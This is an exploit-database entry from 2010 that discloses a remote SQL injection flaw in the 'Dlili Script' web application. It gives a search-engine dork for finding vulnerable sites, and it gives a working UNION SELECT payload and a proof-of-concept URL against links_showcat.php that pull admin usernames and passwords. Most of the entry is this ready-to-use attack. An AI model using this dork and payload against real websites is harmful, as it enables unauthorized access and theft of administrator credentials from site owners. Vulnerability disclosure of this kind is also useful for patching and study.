Dlili Script - SQL Injection



EKU-ID: 18654 CVE: OSVDB-ID:
Author: Dr.DaShEr Published: 2010-02-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


==============================================================================
                  Remote SQL Injection Vulnerability
  ==============================================================================
    [+] Published:           [2010-02-02]
    [+] Script:              [ dlili ]
    [+] Script site:         [ http://www.dlili.com ]
    [+] Author:              {Dr.DaShEr> Nyo@hotmail.com < ]
    [+] Gr44tz to:           [NeX HackEr & XP10_hacker]
  ########################################################################


   [+] Dork: inurl:"links_showcat.php?"


   =[ Exploit ]=

   [+] links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin


   [-] SQLi p0c:

   [+] http://server[path]/links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin


  ###########################################################################